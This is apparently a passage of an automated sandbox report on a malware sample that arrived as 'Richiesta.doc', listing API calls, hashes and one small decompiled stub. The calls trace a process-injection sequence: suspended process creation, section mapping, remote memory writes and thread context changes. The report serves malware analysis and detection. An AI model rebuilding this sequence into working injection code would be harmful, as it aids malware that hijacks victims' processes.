OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
CloseHandle.KERNEL32(?), ref: 002E24E0
GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization

Similarity

Total matches: 294
API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
String ID:
API String ID: 748258982-0
Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6

APIs

RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D

RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141
memorythread

Similarity

Total matches: 141
API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
String ID:
API String ID: 1629895477-0
Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc

C-Code - Quality: 100%

			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00401003
HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
GetLastError.KERNEL32 ref: 00401026
ExitThread.KERNEL32 ref: 0040102D

Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory

Similarity

Total matches: 157
API ID: HeapFree
String ID: Local\
API String ID: 2968971433-422136742
Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a

APIs

Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610

Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE

HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217

Strings

Local\, xrefs: 002E11CD, 002E11D2, 002E11F7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305

Similarity

Total matches: 305
API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
String ID:
API String ID: 4193297829-0
Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string

Similarity

Total matches: 183
API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
String ID: <
API String ID: 1457465641-4251816714
Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85

APIs

memset.NTDLL ref: 002E2CEE
CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

wsprintfW.USER32 ref: 002E2DAE
ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
CoUninitialize.OLE32 ref: 002E2DF7

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Strings

<, xrefs: 002E2DC2

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory

Similarity

Total matches: 162
API ID: CreateProcessGetLastErrorHeapFreememset
String ID: D
API String ID: 1501718689-2746444292
Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8

APIs

memset.NTDLL ref: 002E13B5

Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
GetLastError.KERNEL32(00000001), ref: 002E1422
HeapFree.KERNEL32(00000000,00000000), ref: 002E1433

Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418

Strings

D, xrefs: 002E13CE

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: wukapedof.exe Analysis ID: 68439

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	AD22F7E25E6FCCF900B5060D4C5E9532
Total matches:	32
Initial Analysis Report:	Open
Initial sample Analysis ID:	68439
Initial sample SHA 256:	78E57715D0C6C12E90E96D82B3FF839B78C421F5EFF663AAB6D19DA5B6D82200
Initial sample name:	Richiesta.doc

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

